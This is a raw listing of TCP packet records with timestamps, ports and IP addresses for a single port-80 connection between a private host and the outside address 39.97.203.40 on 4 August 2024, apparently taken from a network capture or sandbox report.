                                          Aug 4, 2024 12:47:09.493351936 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.493470907 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.493521929 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.493844986 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.494946957 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.494996071 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.495279074 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.495412111 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.495462894 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.495870113 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.496675968 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.496726036 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.496973991 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.497293949 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.497344017 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.497571945 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.498205900 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.498255968 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.498426914 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.498734951 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.498785973 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.499018908 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.500049114 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.500099897 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.500283003 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.500411034 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.500461102 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.500808954 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.501821041 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.501872063 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.502018929 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.502140045 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.502191067 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.502556086 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.504297018 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.504348040 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.504714966 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.504729033 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.504785061 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.505254984 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.505539894 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.505592108 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.505753040 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.505892038 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.505942106 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.506253004 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.506828070 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.506879091 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.506949902 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.507217884 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.507267952 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.507431984 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.508464098 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.508517981 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.508654118 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.508842945 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.508891106 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.509064913 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.510067940 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.510114908 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.510246038 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.510504007 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.510555983 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.510690928 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.511957884 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.512017965 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.512119055 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.512445927 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.512500048 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.512651920 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.512666941 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.512706041 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.513911963 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.514281034 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.514296055 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.514329910 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.514859915 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.514878035 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.514908075 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.515486956 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.515538931 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.515609026 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.515983105 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.515996933 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.516031027 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.516463995 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.516486883 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.516518116 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.517072916 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.517124891 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.517558098 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.517573118 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.517587900 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.517616034 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.517995119 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.518043995 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.518323898 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.518338919 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.518383026 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.518770933 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.519100904 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.519117117 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.519150972 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.519542933 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.519593000 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.519885063 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.519901037 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.519947052 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.520320892 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.520657063 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.520672083 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.520713091 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.521008968 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.521060944 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.521107912 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.521466017 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.521480083 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.521514893 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.521821022 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.521868944 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.521939039 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.522247076 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.522286892 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.522299051 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.522713900 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.522764921 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.523006916 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.523343086 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.523356915 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.523391962 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.523591042 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.523641109 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.524132967 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.524259090 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.524272919 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.524311066 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.524478912 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.524539948 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.524660110 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.524761915 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.524805069 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.524811029 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.525028944 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.525078058 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.525525093 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.525646925 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.525660992 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.525695086 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.526452065 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.526503086 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.526576996 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.526590109 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.526634932 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.526757956 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.527275085 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.527327061 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.527371883 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.527389050 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.527432919 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.528265953 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.528400898 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.528415918 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.528450012 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.545581102 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.545622110 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.545639038 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.545805931 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.545806885 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.546097994 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.546120882 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.546138048 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.546155930 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.546284914 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.546286106 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.563318968 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.563339949 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.563355923 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.563551903 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.563740969 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.563764095 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.563780069 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.563797951 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.563927889 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.563929081 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.564269066 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.564439058 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.568527937 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.568578959 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.568593025 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.568644047 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.568707943 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.568742037 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.568758011 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.568953991 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.568953991 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.569238901 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.569259882 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.569305897 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.573925018 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.573988914 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.574029922 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.574044943 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.574240923 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.574259996 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.574275970 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.574424028 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.574424028 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.574666977 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.574682951 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.574728966 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.577920914 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.577954054 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.577972889 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.578006029 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.578030109 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.578058958 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.578083038 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.578099966 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.578214884 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.578214884 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.578622103 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.578676939 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.580041885 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.580127954 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.580142975 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.580182076 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.580336094 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.580353022 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.580387115 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.580666065 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.580682039 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.580697060 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.580718040 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.580748081 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.585681915 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.585829973 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.585845947 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.585994959 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.586218119 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.586234093 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.586250067 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.586266041 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.586287975 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.586287975 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.594448090 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.594504118 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.594516039 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.594521046 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.594589949 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.594866991 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.594887972 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.594903946 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.594918013 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.594934940 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.595067024 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.595067024 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.596018076 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.596075058 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.596174955 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.596191883 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.596235991 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.596400023 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.596416950 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.596462011 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.596649885 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.596667051 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.596682072 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.596710920 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.599253893 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.599306107 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.599350929 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.599368095 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.599530935 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.599776983 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.599792957 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.599807978 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.599837065 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.600086927 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.600142002 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.602873087 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.602986097 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.602999926 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.603033066 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.603230000 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.603245974 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.603260994 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.603276968 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.603279114 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.603297949 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.603765965 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.603818893 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.604672909 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.604784012 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.604799032 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.604825020 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.605098009 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.605114937 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.605130911 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.605144978 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.605146885 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.605171919 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.607168913 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.607215881 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.607278109 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.607294083 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.607337952 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.607697010 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.607804060 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.607819080 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.607834101 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.607846975 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.607846975 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.607884884 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.609781027 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.609824896 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.609889030 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.609906912 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.609952927 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.610081911 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.610097885 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.610112906 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.610141039 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.610518932 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.610533953 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.610567093 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.612701893 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.612747908 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.612807989 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.612824917 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.612869024 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.613110065 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.613125086 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.613174915 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.613372087 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.613388062 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.613436937 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.615272999 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.615381956 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.615397930 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.615436077 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.615724087 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.615737915 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.615752935 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.615767002 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.615773916 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.615803003 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.634121895 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.634227037 CEST804973539.97.203.40192.168.2.4
